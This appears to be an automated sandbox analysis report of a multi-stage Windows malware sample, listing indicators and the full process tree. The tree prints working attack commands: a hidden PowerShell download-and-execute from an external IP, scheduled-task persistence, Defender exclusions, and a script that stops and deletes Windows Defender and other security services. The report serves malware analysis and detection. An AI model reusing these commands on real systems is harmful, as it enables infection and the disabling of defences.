\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1220b1a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbe532ddb7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5924 timeout.exe 2792 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 8384 taskkill.exe 8612 taskkill.exe 8992 taskkill.exe 8200 taskkill.exe 1388 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1676 schtasks.exe 12720 schtasks.exe 6964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5540 powershell.exe 5540 powershell.exe 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 4288 rapes.exe 4288 rapes.exe 4328 powershell.exe 4328 powershell.exe 4328 powershell.exe 2712 c4ab00aec8.exe 2712 c4ab00aec8.exe 2712 c4ab00aec8.exe 2712 c4ab00aec8.exe 2712 c4ab00aec8.exe 2712 c4ab00aec8.exe 12256 BIm18E9.exe 12256 BIm18E9.exe 13116 Exam.com 13116 Exam.com 13116 Exam.com 13116 Exam.com 13116 Exam.com 13116 Exam.com 5896 rapes.exe 5896 rapes.exe 12096 MSBuild.exe 12096 MSBuild.exe 12096 MSBuild.exe 12096 MSBuild.exe 13116 Exam.com 13116 Exam.com 13116 Exam.com 13116 Exam.com 12328 fontdrvhost.exe 12328 fontdrvhost.exe 12328 fontdrvhost.exe 12328 fontdrvhost.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 5492 TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE 5492 TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 6208 powershell.exe 6208 powershell.exe 6208 powershell.exe 6588 powershell.exe 6588 powershell.exe 6588 powershell.exe 1184 MSBuild.exe 1184 MSBuild.exe 1184 MSBuild.exe 1184 MSBuild.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe 7092 powershell.exe 7092 powershell.exe 7092 powershell.exe 3872 483d2fa8a0d53818306efeb32d3.exe 3872 483d2fa8a0d53818306efeb32d3.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 656 Process not Found 7116 1220b1a7.exe 656 Process not Found 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 6040 f73ae_003.exe 6040 f73ae_003.exe 6040 f73ae_003.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 5540 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 11772 tasklist.exe Token: SeDebugPrivilege 12008 tasklist.exe Token: SeDebugPrivilege 7116 1220b1a7.exe Token: SeBackupPrivilege 7116 1220b1a7.exe Token: SeRestorePrivilege 7116 1220b1a7.exe Token: SeLoadDriverPrivilege 7116 1220b1a7.exe Token: SeShutdownPrivilege 7116 1220b1a7.exe Token: SeSystemEnvironmentPrivilege 7116 1220b1a7.exe Token: SeSecurityPrivilege 7116 1220b1a7.exe Token: SeBackupPrivilege 7116 1220b1a7.exe Token: SeRestorePrivilege 7116 1220b1a7.exe Token: SeDebugPrivilege 7116 1220b1a7.exe Token: SeSystemEnvironmentPrivilege 7116 1220b1a7.exe Token: SeSecurityPrivilege 7116 1220b1a7.exe Token: SeCreatePermanentPrivilege 7116 1220b1a7.exe Token: SeShutdownPrivilege 7116 1220b1a7.exe Token: SeLoadDriverPrivilege 7116 1220b1a7.exe Token: SeIncreaseQuotaPrivilege 7116 1220b1a7.exe Token: SeSecurityPrivilege 7116 1220b1a7.exe Token: SeSystemProfilePrivilege 7116 1220b1a7.exe Token: SeDebugPrivilege 7116 1220b1a7.exe Token: SeMachineAccountPrivilege 7116 1220b1a7.exe Token: SeCreateTokenPrivilege 7116 1220b1a7.exe Token: SeAssignPrimaryTokenPrivilege 7116 1220b1a7.exe Token: SeTcbPrivilege 7116 1220b1a7.exe Token: SeAuditPrivilege 7116 1220b1a7.exe Token: SeSystemEnvironmentPrivilege 7116 1220b1a7.exe Token: SeLoadDriverPrivilege 7116 1220b1a7.exe Token: SeLoadDriverPrivilege 7116 1220b1a7.exe Token: SeIncreaseQuotaPrivilege 7116 1220b1a7.exe Token: SeSecurityPrivilege 7116 1220b1a7.exe Token: SeSystemProfilePrivilege 7116 1220b1a7.exe Token: SeDebugPrivilege 7116 1220b1a7.exe Token: SeMachineAccountPrivilege 7116 1220b1a7.exe Token: SeCreateTokenPrivilege 7116 1220b1a7.exe Token: SeAssignPrimaryTokenPrivilege 7116 1220b1a7.exe Token: SeTcbPrivilege 7116 1220b1a7.exe Token: SeAuditPrivilege 7116 1220b1a7.exe Token: SeSystemEnvironmentPrivilege 7116 1220b1a7.exe Token: SeSecurityPrivilege 11436 bild.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 6208 powershell.exe Token: SeDebugPrivilege 6588 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 7092 powershell.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
pid Process 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 13116 Exam.com 13116 Exam.com 13116 Exam.com 11436 bild.exe 12828 cbe532ddb7.exe 12828 cbe532ddb7.exe 12828 cbe532ddb7.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 13116 Exam.com 13116 Exam.com 13116 Exam.com 12828 cbe532ddb7.exe 12828 cbe532ddb7.exe 12828 cbe532ddb7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5960 wrote to memory of 5864 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5960 wrote to memory of 5864 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5960 wrote to memory of 5864 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5960 wrote to memory of 2968 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 90 PID 5960 wrote to memory of 2968 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 90 PID 5960 wrote to memory of 2968 5960 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 90 PID 5864 wrote to memory of 1676 5864 cmd.exe 92 PID 5864 wrote to memory of 1676 5864 cmd.exe 92 PID 5864 wrote to memory of 1676 5864 cmd.exe 92 PID 2968 wrote to memory of 5540 2968 mshta.exe 94 PID 2968 wrote to memory of 5540 2968 mshta.exe 94 PID 2968 wrote to memory of 5540 2968 mshta.exe 94 PID 5540 wrote to memory of 3768 5540 powershell.exe 101 PID 5540 wrote to memory of 3768 5540 powershell.exe 101 PID 5540 wrote to memory of 3768 5540 powershell.exe 101 PID 3768 wrote to memory of 4288 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 103 PID 3768 wrote to memory of 4288 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 103 PID 3768 wrote to memory of 4288 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 103 PID 4288 wrote to memory of 6040 4288 rapes.exe 107 PID 4288 wrote to memory of 6040 4288 rapes.exe 107 PID 4288 wrote to memory of 6040 4288 rapes.exe 107 PID 6040 wrote to memory of 5800 6040 f73ae_003.exe 108 PID 6040 wrote to memory of 5800 6040 f73ae_003.exe 108 PID 6040 wrote to memory of 4024 6040 f73ae_003.exe 110 PID 6040 wrote to memory of 4024 6040 f73ae_003.exe 110 PID 5800 wrote to memory of 4328 5800 cmd.exe 111 PID 5800 wrote to memory of 4328 5800 cmd.exe 111 PID 4288 wrote to memory of 3496 4288 rapes.exe 116 PID 4288 wrote to memory of 3496 4288 rapes.exe 116 PID 4288 wrote to memory of 3496 4288 rapes.exe 116 PID 3496 wrote to memory of 6064 3496 7IIl2eE.exe 117 PID 3496 wrote to memory of 6064 3496 7IIl2eE.exe 117 PID 3496 wrote to memory of 6064 3496 7IIl2eE.exe 117 PID 4024 wrote to memory of 4952 4024 svchost.exe 119 PID 4024 wrote to memory of 4952 4024 svchost.exe 119 PID 4024 wrote to memory of 2664 4024 svchost.exe 120 PID 4024 wrote to memory of 2664 4024 svchost.exe 120 PID 4288 wrote to memory of 2712 4288 rapes.exe 126 PID 4288 wrote to memory of 2712 4288 rapes.exe 126 PID 4288 wrote to memory of 2712 4288 rapes.exe 126 PID 4288 wrote to memory of 7528 4288 rapes.exe 131 PID 4288 wrote to memory of 7528 4288 rapes.exe 131 PID 4288 wrote to memory of 7528 4288 rapes.exe 131 PID 7528 wrote to memory of 7748 7528 WLbfHbp.exe 132 PID 7528 wrote to memory of 7748 7528 WLbfHbp.exe 132 PID 7528 wrote to memory of 7748 7528 WLbfHbp.exe 132 PID 7748 wrote to memory of 11772 7748 CMD.exe 134 PID 7748 wrote to memory of 11772 7748 CMD.exe 134 PID 7748 wrote to memory of 11772 7748 CMD.exe 134 PID 7748 wrote to memory of 11788 7748 CMD.exe 135 PID 7748 wrote to memory of 11788 7748 CMD.exe 135 PID 7748 wrote to memory of 11788 7748 CMD.exe 135 PID 7748 wrote to memory of 12008 7748 CMD.exe 136 PID 7748 wrote to memory of 12008 7748 CMD.exe 136 PID 7748 wrote to memory of 12008 7748 CMD.exe 136 PID 7748 wrote to memory of 12024 7748 CMD.exe 137 PID 7748 wrote to memory of 12024 7748 CMD.exe 137 PID 7748 wrote to memory of 12024 7748 CMD.exe 137 PID 7748 wrote to memory of 3692 7748 CMD.exe 138 PID 7748 wrote to memory of 3692 7748 CMD.exe 138 PID 7748 wrote to memory of 3692 7748 CMD.exe 138 PID 7748 wrote to memory of 12184 7748 CMD.exe 139 PID 7748 wrote to memory of 12184 7748 CMD.exe 139 PID 7748 wrote to memory of 12184 7748 CMD.exe 139 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2596
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:12328
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5960 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn GeFPTma9WGE /tr "mshta C:\Users\Admin\AppData\Local\Temp\OTu1HUmFc.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5864 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GeFPTma9WGE /tr "mshta C:\Users\Admin\AppData\Local\Temp\OTu1HUmFc.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1676
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\OTu1HUmFc.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5540 -
C:\Users\Admin\AppData\Local\TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE"C:\Users\Admin\AppData\Local\TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:6040 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵
- Suspicious use of WriteProcessMemory
PID:5800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:4952
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\{2de74615-42bc-4970-990d-152b9e3da753}\742859a7.exe"C:\Users\Admin\AppData\Local\Temp\{2de74615-42bc-4970-990d-152b9e3da753}\742859a7.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\{b4b7b297-fb08-4e5b-b36e-1555907bd8c6}\1220b1a7.exeC:/Users/Admin/AppData/Local/Temp/{b4b7b297-fb08-4e5b-b36e-1555907bd8c6}/\1220b1a7.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:7116
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340260101\c4ab00aec8.exe"C:\Users\Admin\AppData\Local\Temp\10340260101\c4ab00aec8.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:7528 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:7748 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:11772
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:11788
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:12008
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:12024
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679788⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss8⤵
- System Location Discovery: System Language Discovery
PID:12184
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed8⤵
- System Location Discovery: System Language Discovery
PID:12668
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com8⤵
- System Location Discovery: System Language Discovery
PID:3912
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j8⤵
- System Location Discovery: System Language Discovery
PID:12968
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:13116 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13116 -s 9449⤵
- Program crash
PID:12964
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:6468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:12256
-
-
C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6856 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6048 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8EDD.tmp\8EDE.tmp\8EDF.bat C:\Users\Admin\AppData\Local\Temp\11.exe"8⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3292 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9110.tmp\9111.tmp\9112.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"10⤵
- Drops file in Program Files directory
PID:8892 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:10612
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:1220
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5924
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3556
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5344
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3724
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3844
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:7520
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:7484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:7280
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:7244
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:7204
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:7176
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:3232
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:7828
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:7912
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:7956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:7980
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:8008
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:6024
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:8096
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:9024
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:9232
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:9552
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:9584
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:9648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:9680
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:9700
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:9728
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:9740
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:9780
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:9800
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:9844
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:9852
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:9892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:9920
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:9952
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:10004
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:10036
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:10064
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:10080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:10104
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:10148
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:10172
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:10200
-
-
